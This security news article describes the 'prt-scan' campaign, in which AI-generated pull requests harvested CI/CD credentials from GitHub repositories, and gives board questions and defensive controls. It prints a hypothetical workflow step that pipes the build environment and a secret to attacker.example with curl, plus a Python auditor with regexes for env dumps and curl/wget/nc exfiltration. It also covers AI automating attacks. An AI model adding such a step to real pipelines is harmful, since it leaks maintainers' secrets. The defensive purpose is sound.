A sophisticated AI-driven supply chain attack has compromised more than 500 GitHub repositories worldwide, including repositories belonging to numerous UK organisations, marking the first documented case of machine learning being weaponised to automate the entire lifecycle of a credential harvesting campaign. The 'prt-scan' operation represents a fundamental shift in threat actor capabilities, demonstrating how artificial intelligence can operate at speeds that exceed human review processes.
The prt-scan campaign used machine learning algorithms to automatically generate convincing pull requests that targeted CI/CD pipeline configurations, extracting sensitive credentials and API keys from automated build processes. This attack methodology represents the evolution of supply chain threats from manual reconnaissance to fully automated intelligence gathering that can scale across thousands of targets simultaneously.
Key Facts:
- Over 500 GitHub repositories compromised through AI-generated pull requests
- Machine learning algorithms crafted repository-specific social engineering content
- Attack targeted CI/CD pipeline credentials and API keys automatically
- Campaign operated faster than typical human code review processes
What Makes AI-Powered Supply Chain Attacks Different?
Traditional supply chain attacks required significant manual effort to research target organisations, craft convincing social engineering content, and maintain persistent access across multiple repositories. The prt-scan campaign eliminated these bottlenecks by employing machine learning to automatically analyse repository structures, generate contextually appropriate pull requests, and extract credentials from CI/CD configurations without human intervention.
According to reporting from Wiz, the attackers used six different GitHub accounts to systematically target repositories with automated pull requests that appeared legitimate to cursory review. The AI system analysed existing code patterns, contributor behaviour, and repository metadata to generate convincing modifications that would trigger credential exposure during automated testing processes.
The NCSC's recent guidance on AI security emphasises that organisations must now defend against both human attackers using AI tools and fully autonomous AI-driven attacks that can operate continuously without direct oversight. This represents a qualitative change in the threat landscape that traditional security controls were not designed to address.
How the Automated Credential Harvesting Worked
The prt-scan operation targeted the fundamental trust relationship between open-source contributors and repository maintainers. The AI system would submit pull requests containing subtle modifications to workflow files that would cause CI/CD systems to expose environment variables containing API keys, database credentials, and cloud service tokens during automated testing.
These modifications were crafted to appear as legitimate bug fixes or performance improvements, making them difficult to identify during standard code review processes. The AI system learned from successful compromises to refine its approach across subsequent targets, creating an attack methodology that improved its effectiveness over time.
This automated approach enabled the campaign to operate at unprecedented scale, potentially targeting hundreds of repositories daily while maintaining the contextual awareness needed to evade detection. The speed of automated attacks now exceeds the capacity of human reviewers to thoroughly examine every pull request, creating a fundamental asymmetry in defensive capabilities.
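The mechanics described above can be made concrete with a simplified, entirely hypothetical illustration (the campaign's actual diffs have not been published): a pull request adds a step to a GitHub Actions workflow, framed as a diagnostic or performance tweak, that dumps the build environment to an attacker-controlled endpoint. The endpoint and secret name below are placeholders.

```yaml
# Hypothetical illustration only: the kind of subtle workflow change the
# campaign reportedly used, disguised as a harmless CI "improvement".
name: build
on: [pull_request]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      # Step added by the malicious pull request, framed as a performance fix
      - name: Cache diagnostics
        run: |
          # 'env' dumps every environment variable, including any secrets
          # mapped into this step, to an attacker-controlled host
          env | curl -s -X POST --data-binary @- https://attacker.example/collect
        env:
          API_KEY: ${{ secrets.API_KEY }}   # secret now leaves the runner
```

Changes like this tend to pass static analysis because neither `env` nor `curl` is inherently malicious; only the combination and the destination are.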
Why Traditional Code Review Failed to Stop This Attack
The prt-scan campaign succeeded because it exploited the gap between automated security scanning and human code review processes. Most organisations pair static analysis tools, which catch obvious security vulnerabilities, with human reviewers who focus on functional correctness rather than on sophisticated social engineering attempts.
The AI-generated pull requests were specifically designed to pass automated security scans while containing subtle logic that would expose credentials during the build process. This represents a new category of attack that sits in the blind spot between technical security controls and human oversight processes.
UK organisations following the NCSC's Secure Development guidance typically focus on preventing direct code injection or dependency confusion attacks, but may lack specific processes for identifying AI-generated social engineering attempts that target CI/CD infrastructure rather than application code directly.
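One control that maps directly to this gap, assuming GitHub-hosted repositories: a CODEOWNERS rule that forces approval from a designated team whenever a pull request touches workflow automation, enforced through the "Require review from Code Owners" branch protection setting. The team handle below is a placeholder.

```
# .github/CODEOWNERS
# Any pull request touching CI/CD configuration requires approval from
# the security team before it can merge (with "Require review from
# Code Owners" enabled in branch protection).
/.github/workflows/   @example-org/security-team
/.github/actions/     @example-org/security-team
```

This does not detect AI-generated content, but it removes the ability of an unknown contributor to change workflow files without a human who is specifically looking for this class of attack signing off.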
Boardroom Questions
- Does our organisation have specific processes for reviewing pull requests from unknown contributors that target CI/CD configuration files or workflow automation?
- Can our current security team distinguish between human-generated and AI-generated social engineering attempts in code repositories and collaboration platforms?
- What credentials and API keys are accessible to our automated build processes, and do we have monitoring in place to detect unauthorised access attempts during CI/CD execution?
Quick Diagnostic
- CI/CD Security Review: Do you regularly audit what credentials and environment variables are accessible to your automated build and deployment processes?
- Pull Request Policies: Do you have specific approval requirements for changes to workflow files, CI/CD configurations, or automated testing scripts from external contributors?
- AI Threat Awareness: Has your development team received training on identifying potential AI-generated social engineering attempts in code contributions and collaboration requests?
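The first diagnostic question above can be partially automated. Below is a minimal sketch, using only the Python standard library, that reports which secrets each GitHub Actions workflow references and flags whole-environment dumps or outbound transfers. The regular expressions are illustrative heuristics, not a complete scanner, and will produce false positives.

```python
import re
from pathlib import Path

# Crude heuristics for patterns worth flagging in CI/CD workflow files
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.(\w+)\s*\}\}")   # secret usage
ENV_DUMP = re.compile(r"\b(env|printenv|set)\b")             # environment dumps
EXFIL_HINT = re.compile(r"\b(curl|wget|nc)\b.*\bhttps?://")  # outbound transfers

def audit_workflow(text: str) -> dict:
    """Report the secrets a workflow references plus crude exfiltration hints."""
    return {
        "secrets": sorted(set(SECRET_REF.findall(text))),
        "env_dumps": bool(ENV_DUMP.search(text)),
        "outbound": bool(EXFIL_HINT.search(text)),
    }

def audit_repo(root: str) -> dict:
    """Audit every workflow file under .github/workflows in a checkout."""
    return {
        str(p): audit_workflow(p.read_text())
        for p in Path(root, ".github", "workflows").glob("*.y*ml")
    }
```

Run regularly, a report like this gives a baseline answer to "what credentials are accessible to our build processes", and makes a pull request that suddenly adds a new secret reference or an outbound transfer stand out.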
Related Reading
Popular Security Scanner Trivy Weaponised Against UK DevSecOps Teams in Supply Chain Attack — Attackers compromised Aqua Security's widely-used Trivy vulnerability scanner on March 19, injecting credential-stealing code.
Supply Chain Exit Planning Gap Leaves UK Businesses Exposed to Systematic Failure — New ONS data reveals 37% of UK businesses fear supply chain disruption within 12 months, yet most lack robust exit strategies.
Claude Code Leak Spawns Malware Campaign Targeting UK Developers — Threat actors are exploiting developer interest in Anthropic's leaked Claude Code source by distributing Vidar credential-stealing malware.
First Major Victim Emerges From AI Supply Chain Attack That Hit 500,000 Systems — AI hiring startup Mercor becomes first public victim of LiteLLM supply-chain attack affecting 500,000 systems globally.
Axios NPM Package Compromised in Precision Supply Chain Attack — Attackers inject RAT malware into widely-used JavaScript HTTP client library, exposing UK organisations through CI/CD pipelines.